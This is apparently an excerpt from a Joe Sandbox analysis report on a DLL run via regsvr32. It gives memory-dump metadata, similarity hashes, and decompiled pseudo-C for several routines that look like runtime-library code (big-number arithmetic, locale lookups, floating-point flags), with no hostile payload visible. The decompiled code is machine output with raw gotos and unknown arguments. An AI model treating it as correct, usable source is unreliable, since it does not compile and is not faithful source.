                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                              • String ID: .
                                                                                                              • API String ID: 1164774033-248832578
                                                                                                              • Opcode ID: 3acc42bf8028de85f2c817288cd422713ad5ac35a0d91713067625b2f4763009
                                                                                                              • Instruction ID: aca981826c58a9e89e0b31a9c18f2325146aae2851afa41825e8e1c7781ca2c3
                                                                                                              • Opcode Fuzzy Hash: 3acc42bf8028de85f2c817288cd422713ad5ac35a0d91713067625b2f4763009
                                                                                                              • Instruction Fuzzy Hash: 0541EB72310E5C40FAE29B66A8857E9A391E788BE8F45D122BD59077C4EE3CC74D8348
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800011AC Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LoadResource$String$FindLock
                                                                                                              • String ID:
                                                                                                              • API String ID: 2961929873-0
                                                                                                              • Opcode ID: c12db5ca32142765978bf34af63ee1bcf18d7da4b5d73cec6434683d8aa002e8
                                                                                                              • Instruction ID: 89ed8166feaad9f79d7af7a9a98f08b2c0ab66d7c61c12a2d92dc69fac014027
                                                                                                              • Opcode Fuzzy Hash: c12db5ca32142765978bf34af63ee1bcf18d7da4b5d73cec6434683d8aa002e8
                                                                                                              • Instruction Fuzzy Hash: 7A317C72301549C6EBAADF65D5007ED73A1FB48BC1F54C012BE0987698DE39DA68C350
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004E1C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 69%
                                                                                                              			E0000000118004E1C0(signed int __ecx, signed int __rax, signed int* __rcx, unsigned long long __rdx, signed int __r9, void* __r10, long long __r13, signed int _a8, long long _a16, signed int _a24, signed int _a32) {
				long long _v64;
				char _v532;
				intOrPtr _v536;
				signed long long _v552;
				signed int _v560;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				intOrPtr _v584;
				void* __rbx;
				void* __rsi;
				void* _t132;
				signed int _t148;
				intOrPtr _t161;
				signed int _t163;
				intOrPtr _t164;
				signed int _t180;
				signed int _t191;
				signed int _t192;
				signed int _t213;
				void* _t230;
				signed long long _t241;
				signed int _t244;
				void* _t252;
				signed int* _t255;
				intOrPtr* _t262;
				signed long long _t267;
				unsigned long long _t268;
				signed long long _t269;
				signed long long _t271;
				signed long long _t273;
				signed long long _t277;
				signed long long _t279;
				char* _t285;
				signed int _t288;
				signed long long _t289;
				signed long long _t297;
				signed long long _t298;
				void* _t306;
				unsigned long long _t326;
				signed long long _t327;

				_t268 = __rdx;
				_a16 = __rdx;
				r10d =  *__rcx;
				_t278 = __rcx;
				if (r10d == 0) goto 0x8004e635;
				_t161 =  *__rdx;
				_v584 = _t161;
				if (_t161 == 0) goto 0x8004e635;
				r10d = r10d - 1;
				if (_t252 - 1 != 0) goto 0x8004e2f1;
				r12d =  *(__rdx + 4);
				if (r12d != 1) goto 0x8004e236;
				_t6 =  &_v532; // 0xff63
				_t255 =  &(__rcx[1]);
				 *__rcx = 0;
				r9d = 0;
				_v536 = 0;
				E0000000118005053C(__rax, _t252, _t255, __rdx, __rcx, _t6, __r9);
				goto 0x8004e637;
				if (r10d != 0) goto 0x8004e271;
				_t163 = _t255[1];
				_t9 =  &_v532; // 0xff63
				 *_t255 = 0;
				r9d = 0;
				_v536 = 0;
				E0000000118005053C(__rax, _t252,  &(_t255[1]), _t268, __rcx, _t9, __r9);
				_t180 = _t163 % r12d;
				__rcx[1] = _t180;
				bpl = _t180 != 0;
				 *__rcx = 0;
				goto 0x8004e637;
				r15d = 0xffffffff;
				if (r10d == r15d) goto 0x8004e2b5;
				asm("o16 nop [eax+eax]");
				r10d = r10d + r15d;
				_t326 = _t268;
				if (r10d != r15d) goto 0x8004e290;
				r9d = 0;
				_v536 = 0;
				_t24 =  &_v532; // 0xff63
				_t285 = _t24;
				 *__rcx = 0;
				_t25 = _t278 + 4; // 0xf803
				_t132 = E0000000118005053C(__rax | _t279 << 0x00000020, _t252, _t25, _t268, __rcx, _t285, __r9);
				__rcx[1] = r14d;
				__rcx[2] = __ecx;
				bpl = __ecx != 0;
				 *__rcx = 1;
				goto 0x8004e637;
				if (_t132 - r10d > 0) goto 0x8004e635;
				r8d = r10d;
				_t269 = r10d;
				r8d = r8d - _t132;
				r9d = r10d;
				_t277 = r8d;
				if (_t269 - _t277 < 0) goto 0x8004e357;
				_t262 = (_t326 >> 0x20) + 4 + _t269 * 4;
				if ( *((intOrPtr*)(_t326 - _t277 * 4 - __rcx + _t262)) !=  *_t262) goto 0x8004e340;
				r9d = r9d - 1;
				if (_t269 - 1 - _t277 >= 0) goto 0x8004e327;
				goto 0x8004e357;
				_t271 = r9d - r8d;
				_t241 = r9d;
				if ( *((intOrPtr*)(_t326 + 4 + _t271 * 4)) -  *(__rcx + 4 + _t241 * 4) >= 0) goto 0x8004e35a;
				r8d = r8d + 1;
				_t213 = r8d;
				if (_t213 == 0) goto 0x8004e635;
				r9d =  *(_t326 + 4 + _t241 * 4);
				r11d =  *(_t326 + 4 + _t241 * 4);
				asm("inc ecx");
				_a24 = r11d;
				if (_t213 == 0) goto 0x8004e3a1;
				r12d = 0x20;
				r12d = r12d - 0x1f;
				_a8 = r12d;
				if (0x1f - _t252 - 2 == 0) goto 0x8004e3ed;
				goto 0x8004e3b0;
				_a8 = 0;
				r12d = 0;
				r9d = r11d >> r12d;
				r11d = r11d << 0x20;
				r9d = r9d | r9d << 0x00000020;
				_a24 = r11d;
				if (_t163 - 2 <= 0) goto 0x8004e3ed;
				r11d = r11d |  *(_t326 + 4 + _t241 * 4) >> r12d;
				_a24 = r11d;
				r14d = _t285 - 1;
				_v560 = _t279;
				if (r14d < 0) goto 0x8004e5fe;
				r15d = 0xffffffff;
				_v64 = __r13;
				r13d = _t326 + _t252;
				_v552 = _t241;
				_v568 = __r9;
				if (r13d - r10d > 0) goto 0x8004e42d;
				goto 0x8004e42f;
				_a32 = 0;
				r11d =  *(__rcx + 4 + _t241 * 4);
				_v576 = _t262 - 4;
				_v572 = 0;
				if (0x20 == 0) goto 0x8004e487;
				r8d = r11d;
				r11d = r11d << 0x20;
				if (r13d - 3 < 0) goto 0x8004e48c;
				_t148 =  *(__rcx + 4 + (_v576 << 0x20) * 4) >> r12d;
				r11d = r11d | _t148;
				goto 0x8004e48c;
				_t288 = _v576;
				_t244 = _t288;
				r8d = _t148 % __r9;
				if (_t244 - _t327 <= 0) goto 0x8004e4b8;
				_t297 = _t327;
				_t289 = _t288 + 0x1;
				if (_t289 - _t327 > 0) goto 0x8004e4f1;
				_t267 = _t289 << 0x00000020 | _t279;
				if (0x1 - _t267 <= 0) goto 0x8004e4ed;
				_t298 = _t297 - 1;
				if (_t289 + _v568 - _t327 <= 0) goto 0x8004e4d0;
				_t164 = _v584;
				if (_t298 == 0) goto 0x8004e5d0;
				r11d = 0;
				if (_t164 == 0) goto 0x8004e573;
				_t91 =  &_a8; // 0x0
				r15d =  *_t91;
				r8d = r10d;
				_t306 =  >=  ? _t279 + 0x1 >> 0x20 : (_t279 + 0x1 >> 0x20) + 1;
				r11d = r11d + 1;
				 *((intOrPtr*)(__rcx + 4 + _t267 * 4)) = __rcx[0xffffffff00000002] - r8d;
				if (r11d - _t164 < 0) goto 0x8004e520;
				_a8 = r15d;
				r15d = 0xffffffff;
				_t101 =  &_a8; // 0x0
				r12d =  *_t101;
				if (0x1 - _t306 >= 0) goto 0x8004e5cc;
				r10d = 0;
				if (_t164 == 0) goto 0x8004e5c9;
				asm("o16 nop [eax+eax]");
				r10d = r10d + 1;
				_t273 =  &(__rcx[0xffffffff00000001]);
				 *(_t273 + 4) = r8d;
				_t230 = r10d - _t164;
				if (_t230 < 0) goto 0x8004e5a0;
				r10d = __r13 - 1;
				r13d = r13d - 1;
				r14d = r14d - 1;
				_v560 = (_v560 << 0x20) + 0x1;
				if (_t230 >= 0) goto 0x8004e421;
				_t191 = _t306 + 1;
				if (_t191 -  *__rcx >= 0) goto 0x8004e61c;
				 *((intOrPtr*)(__rcx + 4 + ((0x1 + _t244) * _v568 * _t297 - _t271) * _t298 * 4)) = 0;
				if (_t191 + 1 -  *__rcx < 0) goto 0x8004e610;
				 *__rcx = _t191;
				if (_t191 == 0) goto 0x8004e630;
				_t192 = _t191 - 1;
				if ( *((intOrPtr*)(__rcx + 4 + _t273 * 4)) != 0) goto 0x8004e630;
				 *__rcx = _t192;
				if (_t192 != 0) goto 0x8004e622;
				goto 0x8004e637;
				return 0;
			}












































                                                                                                              0x18004e1c0
                                                                                                              0x18004e1c0
                                                                                                              0x18004e1d6
                                                                                                              0x18004e1dc
                                                                                                              0x18004e1e2
                                                                                                              0x18004e1e8
                                                                                                              0x18004e1ea
                                                                                                              0x18004e1f0
                                                                                                              0x18004e1f6
                                                                                                              0x18004e1fe
                                                                                                              0x18004e204
                                                                                                              0x18004e20e
                                                                                                              0x18004e213
                                                                                                              0x18004e218
                                                                                                              0x18004e21c
                                                                                                              0x18004e21e
                                                                                                              0x18004e221
                                                                                                              0x18004e22a
                                                                                                              0x18004e231
                                                                                                              0x18004e239
                                                                                                              0x18004e23b
                                                                                                              0x18004e23e
                                                                                                              0x18004e243
                                                                                                              0x18004e245
                                                                                                              0x18004e24c
                                                                                                              0x18004e255
                                                                                                              0x18004e25e
                                                                                                              0x18004e263
                                                                                                              0x18004e266
                                                                                                              0x18004e26a
                                                                                                              0x18004e26c
                                                                                                              0x18004e271
                                                                                                              0x18004e280
                                                                                                              0x18004e285
                                                                                                              0x18004e29b
                                                                                                              0x18004e2aa
                                                                                                              0x18004e2b3
                                                                                                              0x18004e2b5
                                                                                                              0x18004e2b8
                                                                                                              0x18004e2bc
                                                                                                              0x18004e2bc
                                                                                                              0x18004e2c1
                                                                                                              0x18004e2c8
                                                                                                              0x18004e2cc
                                                                                                              0x18004e2d4
                                                                                                              0x18004e2e1
                                                                                                              0x18004e2e4
                                                                                                              0x18004e2ea
                                                                                                              0x18004e2ec
                                                                                                              0x18004e2f4
                                                                                                              0x18004e2fa
                                                                                                              0x18004e2fd
                                                                                                              0x18004e300
                                                                                                              0x18004e303
                                                                                                              0x18004e306
                                                                                                              0x18004e30c
                                                                                                              0x18004e323
                                                                                                              0x18004e32d
                                                                                                              0x18004e32f
                                                                                                              0x18004e33c
                                                                                                              0x18004e33e
                                                                                                              0x18004e346
                                                                                                              0x18004e349
                                                                                                              0x18004e355
                                                                                                              0x18004e357
                                                                                                              0x18004e35a
                                                                                                              0x18004e35d
                                                                                                              0x18004e368
                                                                                                              0x18004e370
                                                                                                              0x18004e375
                                                                                                              0x18004e379
                                                                                                              0x18004e381
                                                                                                              0x18004e388
                                                                                                              0x18004e390
                                                                                                              0x18004e393
                                                                                                              0x18004e39d
                                                                                                              0x18004e39f
                                                                                                              0x18004e3a6
                                                                                                              0x18004e3ad
                                                                                                              0x18004e3bf
                                                                                                              0x18004e3c2
                                                                                                              0x18004e3c5
                                                                                                              0x18004e3c8
                                                                                                              0x18004e3d3
                                                                                                              0x18004e3e2
                                                                                                              0x18004e3e5
                                                                                                              0x18004e3ed
                                                                                                              0x18004e3f1
                                                                                                              0x18004e3fc
                                                                                                              0x18004e405
                                                                                                              0x18004e40b
                                                                                                              0x18004e413
                                                                                                              0x18004e417
                                                                                                              0x18004e41c
                                                                                                              0x18004e424
                                                                                                              0x18004e42b
                                                                                                              0x18004e42f
                                                                                                              0x18004e442
                                                                                                              0x18004e447
                                                                                                              0x18004e44c
                                                                                                              0x18004e452
                                                                                                              0x18004e459
                                                                                                              0x18004e46c
                                                                                                              0x18004e473
                                                                                                              0x18004e480
                                                                                                              0x18004e482
                                                                                                              0x18004e485
                                                                                                              0x18004e487
                                                                                                              0x18004e48e
                                                                                                              0x18004e494
                                                                                                              0x18004e49d
                                                                                                              0x18004e4ac
                                                                                                              0x18004e4b5
                                                                                                              0x18004e4bb
                                                                                                              0x18004e4d7
                                                                                                              0x18004e4dd
                                                                                                              0x18004e4df
                                                                                                              0x18004e4eb
                                                                                                              0x18004e4ed
                                                                                                              0x18004e4f4
                                                                                                              0x18004e4fd
                                                                                                              0x18004e502
                                                                                                              0x18004e50c
                                                                                                              0x18004e50c
                                                                                                              0x18004e534
                                                                                                              0x18004e54a
                                                                                                              0x18004e551
                                                                                                              0x18004e554
                                                                                                              0x18004e55b
                                                                                                              0x18004e55d
                                                                                                              0x18004e565
                                                                                                              0x18004e56b
                                                                                                              0x18004e56b
                                                                                                              0x18004e57d
                                                                                                              0x18004e57f
                                                                                                              0x18004e584
                                                                                                              0x18004e595
                                                                                                              0x18004e5a4
                                                                                                              0x18004e5ab
                                                                                                              0x18004e5bc
                                                                                                              0x18004e5c4
                                                                                                              0x18004e5c7
                                                                                                              0x18004e5cc
                                                                                                              0x18004e5d5
                                                                                                              0x18004e5e7
                                                                                                              0x18004e5eb
                                                                                                              0x18004e5f0
                                                                                                              0x18004e5fe
                                                                                                              0x18004e606
                                                                                                              0x18004e614
                                                                                                              0x18004e61a
                                                                                                              0x18004e61c
                                                                                                              0x18004e620
                                                                                                              0x18004e622
                                                                                                              0x18004e628
                                                                                                              0x18004e62a
                                                                                                              0x18004e62e
                                                                                                              0x18004e633
                                                                                                              0x18004e648

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 1502251526-3916222277
                                                                                                              • Opcode ID: 920311cc3c5fff1d31e6eba0627abcb87bf00699576b4c3ad21dc0327bf1eaa7
                                                                                                              • Instruction ID: 0c46df22676eff7597709d3687c79b5921587a4009a297480d4d8d69f5676e2b
                                                                                                              • Opcode Fuzzy Hash: 920311cc3c5fff1d31e6eba0627abcb87bf00699576b4c3ad21dc0327bf1eaa7
                                                                                                              • Instruction Fuzzy Hash: 88C12972714AC887D761CF19E088B9EB791F3997C8F46C125EB4643B84DB38DA49CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004C364 Relevance: 4.7, APIs: 3, Instructions: 169COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 48%
                                                                                                              			E0000000118004C364(void* __ecx, void* __edx, void* __ebp, long long __rbx, void* __rcx, void* __rdx) {
				void* __rsi;
				signed int _t47;
				int _t48;
				void* _t49;
				void* _t55;
				signed int _t63;
				signed int _t72;
				signed int _t81;
				signed long long _t123;
				signed long long _t124;
				void* _t130;
				void* _t149;
				signed int* _t150;
				int _t152;
				intOrPtr* _t153;
				signed long long _t155;
				signed long long _t156;
				void* _t159;
				signed long long _t160;
				void* _t168;

				_t143 = __rdx;
				 *((long long*)(_t159 + 0x10)) = __rbx;
				 *(_t159 + 0x18) = _t155;
				_t160 = _t159 - 0x120;
				_t123 =  *0x80070098; // 0xde2ac6aee6eb
				_t124 = _t123 ^ _t160;
				 *(_t160 + 0x110) = _t124;
				_t130 = __rcx;
				E0000000118003CFF0(_t124, __rcx, __rdx, _t152, _t168);
				_t4 = _t124 + 0x98; // 0x98
				_t153 = _t4;
				E0000000118003CFF0(_t124, _t130, _t143, _t153, _t149);
				_t150 =  *((intOrPtr*)(_t124 + 0x3a0));
				_t47 = E0000000118004C6B8(_t130, _t143);
				r9d = 0x78;
				_t72 = _t47;
				asm("sbb edx, edx");
				_t48 = GetLocaleInfoW(_t152, ??, ??);
				r14d = 0;
				if (_t48 == 0) goto 0x8004c57e;
				_t49 = E00000001180014B1C(_t124,  *((intOrPtr*)(_t153 + 8)));
				_t156 = _t155 | 0xffffffff;
				if (_t49 != 0) goto 0x8004c4b3;
				_t11 = _t168 + 0x78; // 0x78
				r9d = _t11;
				asm("sbb edx, edx");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8004c57e;
				if (E00000001180014B1C(_t124,  *_t153) != 0) goto 0x8004c445;
				_t150[1] = _t72;
				goto 0x8004c4ae;
				if ((( *_t150 | 0x00000304) & 0x00000002) != 0) goto 0x8004c4b3;
				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x8004c48d;
				_t55 = E000000011800552C8(_t124,  *_t153);
				if (_t55 != 0) goto 0x8004c48b;
				_t81 =  *_t150 | 0x00000002;
				_t150[2] = _t72;
				 *_t150 = _t81;
				if ( *((intOrPtr*)( *_t153 + (_t156 + 1) * 2)) != r14w) goto 0x8004c477;
				if (_t55 !=  *((intOrPtr*)(_t153 + 0x14))) goto 0x8004c4b3;
				_t150[1] = _t72;
				goto 0x8004c4b3;
				if ((_t81 & 0x00000001) != 0) goto 0x8004c4b3;
				if (_t72 ==  *0x80062ba8) goto 0x8004c4b3;
				if (r14d + 1 - 0xa < 0) goto 0x8004c49b;
				_t150[2] = _t72;
				 *_t150 = _t81 | 0x00000001;
				if (( *_t150 & 0x00000300) == 0x300) goto 0x8004c572;
				r9d = 0x78;
				asm("sbb edx, edx");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8004c57e;
				if (E00000001180014B1C(0x180062baa,  *_t153) != 0) goto 0x8004c538;
				_t63 =  *_t150;
				asm("bts eax, 0x9");
				 *_t150 = _t63;
				if ( *((intOrPtr*)(_t153 + 0x18)) == r14d) goto 0x8004c519;
				asm("bts eax, 0x8");
				 *_t150 = _t63;
				goto 0x8004c569;
				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x8004c511;
				if ( *((intOrPtr*)( *_t153 + (_t156 + 1) * 2)) != r14w) goto 0x8004c522;
				if (__ebp !=  *((intOrPtr*)(_t153 + 0x14))) goto 0x8004c511;
				goto 0x8004c557;
				if ( *((intOrPtr*)(_t153 + 0x18)) != r14d) goto 0x8004c572;
				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x8004c572;
				if (E00000001180014B1C(0x180062baa,  *_t153) != 0) goto 0x8004c572;
				if (E0000000118004C7DC(_t72, 0, 0x180062baa, _t130,  *_t153, _t160 + 0x20, _t153) == 0) goto 0x8004c572;
				asm("bts dword [edi], 0x8");
				if (_t150[1] != r14d) goto 0x8004c572;
				_t150[1] = _t72;
				goto 0x8004c586;
				 *_t150 = r14d;
				return E000000011800028F0(1, _t72,  *(_t160 + 0x110) ^ _t160);
			}























                                                                                                              0x18004c364
                                                                                                              0x18004c364
                                                                                                              0x18004c369
                                                                                                              0x18004c372
                                                                                                              0x18004c379
                                                                                                              0x18004c380
                                                                                                              0x18004c383
                                                                                                              0x18004c38b
                                                                                                              0x18004c38e
                                                                                                              0x18004c393
                                                                                                              0x18004c393
                                                                                                              0x18004c39a
                                                                                                              0x18004c3a2
                                                                                                              0x18004c3a9
                                                                                                              0x18004c3b8
                                                                                                              0x18004c3c0
                                                                                                              0x18004c3c2
                                                                                                              0x18004c3d0
                                                                                                              0x18004c3d6
                                                                                                              0x18004c3db
                                                                                                              0x18004c3ea
                                                                                                              0x18004c3ef
                                                                                                              0x18004c3f5
                                                                                                              0x18004c3fe
                                                                                                              0x18004c3fe
                                                                                                              0x18004c40b
                                                                                                              0x18004c421
                                                                                                              0x18004c438
                                                                                                              0x18004c440
                                                                                                              0x18004c443
                                                                                                              0x18004c448
                                                                                                              0x18004c450
                                                                                                              0x18004c45e
                                                                                                              0x18004c467
                                                                                                              0x18004c469
                                                                                                              0x18004c46c
                                                                                                              0x18004c46f
                                                                                                              0x18004c47f
                                                                                                              0x18004c484
                                                                                                              0x18004c486
                                                                                                              0x18004c489
                                                                                                              0x18004c48f
                                                                                                              0x18004c49e
                                                                                                              0x18004c4a9
                                                                                                              0x18004c4ae
                                                                                                              0x18004c4b1
                                                                                                              0x18004c4be
                                                                                                              0x18004c4ce
                                                                                                              0x18004c4d6
                                                                                                              0x18004c4ec
                                                                                                              0x18004c501
                                                                                                              0x18004c503
                                                                                                              0x18004c505
                                                                                                              0x18004c509
                                                                                                              0x18004c50f
                                                                                                              0x18004c511
                                                                                                              0x18004c515
                                                                                                              0x18004c517
                                                                                                              0x18004c51d
                                                                                                              0x18004c52a
                                                                                                              0x18004c52f
                                                                                                              0x18004c536
                                                                                                              0x18004c53c
                                                                                                              0x18004c542
                                                                                                              0x18004c553
                                                                                                              0x18004c563
                                                                                                              0x18004c565
                                                                                                              0x18004c56d
                                                                                                              0x18004c56f
                                                                                                              0x18004c57c
                                                                                                              0x18004c57e
                                                                                                              0x18004c5ad

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 1791019856-0
                                                                                                              • Opcode ID: 52e28f6c20b324a62e4c8f9d35588509636b51567f96745485e880139065356f
                                                                                                              • Instruction ID: ed01af84e9f56541690c3dce3bc127b132014f179a247da3b93a7e5693274500
                                                                                                              • Opcode Fuzzy Hash: 52e28f6c20b324a62e4c8f9d35588509636b51567f96745485e880139065356f
                                                                                                              • Instruction Fuzzy Hash: D661D332600E098AEBF58F15E5907ED73A1F3887C8F01C125EB9A93695DF38DA98C705
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800475F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                              • Opcode ID: e22e5297c09e8ec518552be1e12a1eda3cf067da00bfbeb5cbe1fbd0104193af
                                                                                                              • Instruction ID: 6a5816b5ab4279ef34768ab48b3a2dc14a57c55b1a9ab1421480b240a053e650
                                                                                                              • Opcode Fuzzy Hash: e22e5297c09e8ec518552be1e12a1eda3cf067da00bfbeb5cbe1fbd0104193af
                                                                                                              • Instruction Fuzzy Hash: D501A230B00B8885E7858B56B8407CAA361A78CBC5F58842AFE5D13B66CE38C6498340
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018005A5A4 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODECrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 27%
                                                                                                              			E0000000118005A5A4(signed int __eax, long long __rbx, long long __rcx, signed long long* __rdx, long long __rdi, long long __rsi, signed int* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, signed int* _a48, intOrPtr _a56) {
				signed int _t149;
				signed int _t153;
				signed int _t157;
				signed int _t184;
				signed int _t219;
				void* _t222;
				signed long long _t241;
				signed long long _t242;
				signed int* _t267;
				signed int* _t268;
				signed int* _t269;
				signed long long _t273;
				signed int* _t276;
				signed int _t280;
				signed int* _t284;
				long _t286;
				void* _t289;

				_t222 = _t289;
				 *((long long*)(_t222 + 0x10)) = __rbx;
				 *((long long*)(_t222 + 0x18)) = __rsi;
				 *((long long*)(_t222 + 0x20)) = __rdi;
				 *((long long*)(_t222 + 8)) = __rcx;
				 *((intOrPtr*)(__rcx + 4)) = 0;
				_a8[2] = 0;
				_a8[3] = 0;
				if ((r8b & 0x00000010) == 0) goto 0x8005a5f0;
				_a8[1] = _a8[1] | 0x00000001;
				if ((r8b & 0x00000002) == 0) goto 0x8005a603;
				_a8[1] = _a8[1] | 0x00000002;
				if ((r8b & 0x00000001) == 0) goto 0x8005a616;
				_a8[1] = _a8[1] | 0x00000004;
				if ((r8b & 0x00000004) == 0) goto 0x8005a629;
				_a8[1] = _a8[1] | 0x00000008;
				if ((r8b & 0x00000008) == 0) goto 0x8005a63c;
				_a8[1] = _a8[1] | 0x00000010;
				_t267 = _a8;
				_t149 = ( !(__eax << 4) ^  *(_t267 + 8)) & 0x00000010;
				 *(_t267 + 8) =  *(_t267 + 8) ^ _t149;
				_t268 = _a8;
				_t153 = ( !(_t149 << 3) ^  *(_t268 + 8)) & 0x00000008;
				 *(_t268 + 8) =  *(_t268 + 8) ^ _t153;
				_t269 = _a8;
				_t157 = ( !(_t153 << 2) ^  *(_t269 + 8)) & 0x00000004;
				 *(_t269 + 8) =  *(_t269 + 8) ^ _t157;
				_a8[2] = _a8[2] ^ ( !(_t157 + _t157) ^ _a8[2]) & 0x00000002;
				_a8[2] = _a8[2] ^ ( !( *__rdx) ^ _a8[2]) & 0x00000001;
				if ((E0000000118005AA9C(( !( *__rdx) ^ _a8[2]) & 0x00000001) & 0x00000001) == 0) goto 0x8005a6c8;
				_a8[3] = _a8[3] | 0x00000010;
				if (0 == 0) goto 0x8005a6d5;
				_t273 = _a8;
				 *(_t273 + 0xc) =  *(_t273 + 0xc) | 0x00000008;
				if (0 == 0) goto 0x8005a6e2;
				_a8[3] = _a8[3] | 0x00000004;
				if (0 == 0) goto 0x8005a6ef;
				_a8[3] = _a8[3] | 0x00000002;
				if (0 == 0) goto 0x8005a6fc;
				_t241 = _a8;
				 *(_t241 + 0xc) =  *(_t241 + 0xc) | 0x00000001;
				_t242 = _t241 & _t273;
				if (0 == 0) goto 0x8005a746;
				if (_t242 == 0x2000) goto 0x8005a736;
				if (_t242 == 0x4000) goto 0x8005a726;
				if (_t242 != _t273) goto 0x8005a74d;
